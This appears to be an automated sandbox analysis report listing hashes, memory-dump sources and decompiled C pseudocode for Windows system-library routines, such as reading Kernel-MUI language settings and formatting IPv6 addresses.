API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 0083FC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 00841D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 0083FD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0083FE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 0083FFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 0083FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00868788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00868788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00868460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0084E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0086718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00868460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0086718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00868460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00868460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00868460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0086718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0084E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00842340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0085E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0084E2A8(_t322,  &_v68, _v16);
								if(E00865553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0085E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0084E2A8(_t322,  &_v68, _t236);
								if(E00865553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0086718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0084E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00842340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0085E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0084E2A8(_v12,  &_v68, _v16);
							if(E00865553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0085E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0084E2A8(_t322,  &_v68, _t269);
							if(E00865553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0086718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0084E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00842340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0085E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0084E2A8(_v12,  &_v68, _v16);
						if(E00865553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0085E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0084E2A8(_t322,  &_v68, _t296);
						if(E00865553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0084E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00868788
0x00868788
0x00868791
0x00868794
0x00868798
0x0086879b
0x0086879e
0x008687a1
0x008687a4
0x008687a7
0x008687aa
0x008687af
0x008b1ad3
0x00868b0a
0x00868b0d
0x00868b13
0x00868b19
0x00868b1f
0x00868b25
0x00868b2b
0x00868b31
0x00868b37
0x00868b3d
0x00868b46
0x00868b46
0x008687c6
0x008687d0
0x008b1ae0
0x008b1ae6
0x008b1af8
0x008b1af8
0x008b1afd
0x008b1afe
0x008b1b01
0x008b1b06
0x008b1b06
0x008687d6
0x008687f2
0x008687f7
0x00868807
0x0086880a
0x0086880f
0x00868810
0x00868813
0x00868818
0x00868818
0x0086882c
0x00868831
0x00868838
0x00868908
0x00868920
0x008689f0
0x00868a08
0x00868af6
0x00868af6
0x00868af8
0x00868afb
0x008b1beb
0x008b1beb
0x00868b04
0x008b1bf8
0x008b1c0e
0x008b1c13
0x008b1c16
0x008b1c16
0x008b1bf8
0x00000000
0x00868b04
0x00868a0e
0x00868a11
0x00868a14
0x00868a15
0x00868a18
0x00868a22
0x00868b59
0x00868a28
0x00868a3c
0x00868a3c
0x00868a42
0x008b1bb0
0x008b1b11
0x008b1b11
0x00000000
0x00868a48
0x00868a51
0x00868a5b
0x00868a5e
0x00868a61
0x00868a69
0x00868a69
0x00868a6d
0x00000000
0x00000000
0x00868a74
0x00868a7c
0x00868a7d
0x00868a91
0x00868a93
0x00868a93
0x00868a98
0x00868a9b
0x00868aa1
0x00868aa1
0x00868aa4
0x00868aaa
0x00868ab1
0x00868ac5
0x00868ac7
0x00868ac7
0x00868ac5
0x00868ace
0x008b1bc9
0x008b1bce
0x008b1bd2
0x008b1bd2
0x00868ad8
0x00868aeb
0x00868aeb
0x00868af0
0x00868af4
0x00000000
0x00868af4
0x00868a42
0x00868926
0x00868929
0x0086892c
0x0086892d
0x00868930
0x00868935
0x0086893a
0x00868b51
0x00868940
0x00868954
0x00868954
0x0086895a
0x008b1b63
0x00000000
0x00868960
0x00868969
0x00868973
0x00868976
0x00868979
0x0086897e
0x00868981
0x00868981
0x00868986
0x00000000
0x00000000
0x008b1b6e
0x008b1b74
0x008b1b7b
0x008b1b8f
0x008b1b91
0x008b1b91
0x008b1b99
0x008b1b9c
0x008b1ba2
0x008b1ba2
0x0086898c
0x00868992
0x00868999
0x008689ad
0x008b1ba8
0x008b1ba8
0x008689ad
0x008689b6
0x008689c8
0x008689cd
0x008689d0
0x008689d0
0x008689d6
0x008689e8
0x008689e8
0x008689ed
0x00000000
0x008689ed
0x0086895a
0x0086883e
0x00868841
0x00868844
0x00868845
0x00868848
0x0086884d
0x00868852
0x00868b49
0x00868858
0x0086886c
0x0086886c
0x00868872
0x008b1b0e
0x00000000
0x00868878
0x00868881
0x0086888b
0x0086888e
0x00868891
0x00868896
0x00868899
0x00868899
0x0086889e
0x00000000
0x00000000
0x008b1b21
0x008b1b27
0x008b1b2e
0x008b1b42
0x008b1b44
0x008b1b44
0x008b1b4c
0x008b1b4f
0x008b1b55
0x008b1b55
0x008688a4
0x008688aa
0x008688b1
0x008688c5
0x008b1b5b
0x008b1b5b
0x008688c5
0x008688ce
0x008688e0
0x008688e5
0x008688e8
0x008688e8
0x008688ee
0x00868900
0x00868900
0x00868905
0x00000000
0x00868905

APIs

_wcspbrk.LIBCMT ref: 00868891
_wcspbrk.LIBCMT ref: 00868979
_wcspbrk.LIBCMT ref: 00868A61
_wcspbrk.LIBCMT ref: 00868A9B
_wcspbrk.LIBCMT ref: 008B1B9C

Strings

Kernel-MUI-Language-Disallowed, xrefs: 00868914
WindowsExcludedProcs, xrefs: 008687C1
Kernel-MUI-Language-Allowed, xrefs: 00868827
Kernel-MUI-Number-Allowed, xrefs: 008687E6
Kernel-MUI-Language-SKU, xrefs: 008689FC

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 96da25a105ae18565e3bb131a1199a6f8336b54c91236ddd8abc139ed9b1d094
Instruction ID: a0beedfd14064349cd93d236cab166ebf6afab2a9e8389e16cba178684f12ebb
Opcode Fuzzy Hash: 96da25a105ae18565e3bb131a1199a6f8336b54c91236ddd8abc139ed9b1d094
Instruction Fuzzy Hash: DCF1E3B2D00209EFCF11DF98C9859EEBBB8FF08304F15456AE515E7211EB349A45DB62

Uniqueness

Uniqueness Score: -1.00%

Function 008813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E008813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00877707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x842926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00877707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x849cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00877707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00877707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00877707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00877707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x008813d5
0x008813d9
0x008813dc
0x008813de
0x008813e1
0x008813e8
0x008813ee
0x008ae8fd
0x00000000
0x008ae921
0x008ae921
0x008ae928
0x008ae982
0x008ae98a
0x00000000
0x008ae99a
0x008ae99e
0x008ae9a3
0x008ae9a8
0x008ae9b9
0x008ae978
0x00000000
0x008ae978
0x008ae98a
0x008ae92a
0x008ae931
0x008ae944
0x008ae944
0x008ae950
0x008ae954
0x008ae959
0x008ae95e
0x008ae963
0x008ae970
0x00000000
0x008ae975
0x008ae93b
0x008ae980
0x00000000
0x008ae980
0x008ae942
0x008ae94b
0x00000000
0x008ae94b
0x00000000
0x008ae942
0x008813f4
0x008813f4
0x008813f9
0x008813fc
0x008813ff
0x00881406
0x008ae9cc
0x008ae9d2
0x008ae9d2
0x008ae9cc
0x0088140c
0x00881411
0x00881431
0x0088143a
0x0088143c
0x0088143f
0x0088143f
0x00881442
0x00881447
0x008814a8
0x008814ac
0x008ae9e2
0x008ae9e7
0x008ae9ec
0x008aea05
0x008aea05
0x00000000
0x00881449
0x00000000
0x00881449
0x0088144c
0x00881459
0x00881462
0x00881469
0x0088146a
0x00881470
0x00881473
0x00881476
0x00881476
0x00881490
0x00881495
0x0088138e
0x00881390
0x00881397
0x00881398
0x00881399
0x008813a1
0x008813a4
0x008813a4
0x00881498
0x0088149c
0x0088149f
0x008814a2
0x00000000
0x00000000
0x008814a4
0x00000000
0x008814a4
0x00881413
0x00881415
0x00881416
0x00881419
0x0088141c
0x00881422
0x008813b7
0x008813bc
0x008813bf
0x008813bf
0x008813c2
0x00881424
0x00881424
0x00881424
0x00881427
0x0088142b
0x0088142c
0x0088142c
0x0088142c
0x00000000
0x0088141c
0x00881411

APIs

___swprintf_l.LIBCMT ref: 0088146B
___swprintf_l.LIBCMT ref: 00881490
___swprintf_l.LIBCMT ref: 008AE970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 008AE9B0
:%u.%u.%u.%u, xrefs: 008AE9F4
::%hs%u.%u.%u.%u, xrefs: 008AE967
ffff:, xrefs: 008AE94B

Memory Dump Source

Source File: 00000005.00000002.2158540931.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true

Associated: 00000005.00000002.2158531301.0000000000820000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159475098.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159481998.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159487236.0000000000924000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159492239.0000000000927000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159496990.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2159536082.0000000000990000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 2e5e7e3911b951f93d1aec09973331cd137b7474328ce1fc74d804ea0e51433a
Instruction ID: f5f1eb41661b95fd6dd23749a24487c9559a515f84d84ab06f078fab21e10d96
Opcode Fuzzy Hash: 2e5e7e3911b951f93d1aec09973331cd137b7474328ce1fc74d804ea0e51433a
Instruction Fuzzy Hash: A6612971900659AACF34EF5DC8848BF7BBAFF95300718C42DE5EAC7640DA34AA41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00877EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00877EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x922088; // 0x77658f66
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00877F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
